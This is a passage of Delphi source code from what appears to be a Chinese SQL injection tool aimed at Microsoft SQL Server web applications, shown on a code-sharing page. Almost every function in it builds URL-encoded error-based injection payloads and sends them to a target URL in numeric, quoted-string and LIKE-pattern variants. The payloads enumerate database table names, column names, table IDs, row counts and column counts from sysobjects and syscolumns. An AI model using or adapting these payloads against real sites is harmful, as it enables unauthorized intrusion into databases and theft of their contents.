📄 cjdatabase_unit.~pas
字号:
//*********************
str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
'%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + FDbName + ']..[sysobjects]' +
'%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
result:=define_unit.GetURLMsg(URL);
finally
end;
end;
//**********************************************************
//**********************************************************
//函数:获取数据库表名
function GetTableNameByDb(str_url:string;str_db:string;iTop:integer):string;
var
str_ext:string;
URL:string;
begin
FDbName:=Form_main.suiEdit_dbname.Text;
try
//*********************
str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
'%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + str_db + ']..[sysobjects]' +
'%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
result:=define_unit.GetURLMsg(URL);
finally
end;
end;
//**********************************************************
//函数:获取表的记录数 ,返回一个表示记录数的字符
function GetRecordCount(str_url,TableName:string):string;
var
sCount:string;//存放返回的表示记录数的字符
URL:string;
str_ext:string;
begin
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
'%2Bchar(94)%20From%20['+FDbName+']..['+ TableName + ']%20Where%201=1)>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取表记录数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
try
strtoint(sCount);
except
sCount:='未知';
end;
result:=sCount;
end;
//**********************************************************
//**********************************************************
//函数:获取表的记录数 ,返回一个表示记录数的字符
function GetRecordCountByDb(str_url,str_db,TableName:string):string;
var
sCount:string;//存放返回的表示记录数的字符
URL:string;
str_ext:string;
begin
str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
'%2Bchar(94)%20From%20['+str_db+']..['+ TableName + ']%20Where%201=1)>0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取表记录数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
try
strtoint(sCount);
except
sCount:='未知';
end;
result:=sCount;
end;
//**********************************************************
//函数:从sysobjects中获去用户表的个数
function GetUserTableCount(str_url:string):integer;
var
sCount:string;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
+FDbName+']..[sysobjects]%20where%20xtype=char(85))=0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取系统表中的用户表个数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//将获取的用户表个数转换成整型
try
result:=strtoint(sCount);
except
on E:Exception do
begin
result:=0;
end;
end;
//*********************
end;
//**********************************************************
//函数:通过表名获得表的id
function GetTableNameID(str_url:string;TableName:string):string;
var
TableID:string;
str_ext:string;
URL:string;
begin
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str_ext:='%20And%20(select%20char(94)%2Bcast(id%20as%20varchar(80))%2Bchar(94)%20from%20['
+FDbName+']..[sysobjects]%20where%20name%20=%20'''+TableName+''')=0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
TableID:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取用户表ID时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
result:=TableID;
//*********************
end;
//**********************************************************
//函数:通过表的id获取表名
function GetColumName(str_url:string;iTop:integer;TableName:string):string;
var
ColumName:string;
ColumNames:TStringList;
i:integer;
ColumnsCount:integer;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
try
//*********************
str_ext:='%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))'+
'%20from(Select%20Top%20'+inttostr(iTop)+'%20B.name%20from%20['+FDbName+']..[sysobjects]%20A%20,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20order%20by%20B.name%20asc)%20T%20order%20by%20name%20desc)>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
result:=define_unit.GetURLMsg(URL);
except
Application.MessageBox(pchar('获取用户表列名时出现异常,操作终止!'),'提示',mb_ok+mb_iconinformation);
end;
//*********************
end;
//**********************************************************
//**********************************************************
//函数:通过表的id获取表名
function GetColumNameByDb(str_url:string;iTop:integer;DbName:string;TableName:string):string;
var
ColumName:string;
ColumNames:TStringList;
i:integer;
ColumnsCount:integer;
str_ext:string;
URL:string;
begin
try
//*********************
str_ext:='%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))'+
'%20from(Select%20Top%20'+inttostr(iTop)+'%20B.name%20from%20['+DbName+']..[sysobjects]%20A%20,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20order%20by%20B.name%20asc)%20T%20order%20by%20name%20desc)>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
result:=define_unit.GetURLMsg(URL);
except
Application.MessageBox(pchar('获取用户表列名时出现异常,操作终止!'),'提示',mb_ok+mb_iconinformation);
end;
//*********************
end;
//**********************************************************
//函数:获取一个表的列数
function GetColumnCount(str_url:string;TableName:string):integer;
var
sCount:string;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
+FDbName+']..[syscolumns]%20A,['+FDbName+']..[sysobjects]%20B%20where%20A.id=B.id%20and%20B.name='''+TableName+''')>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -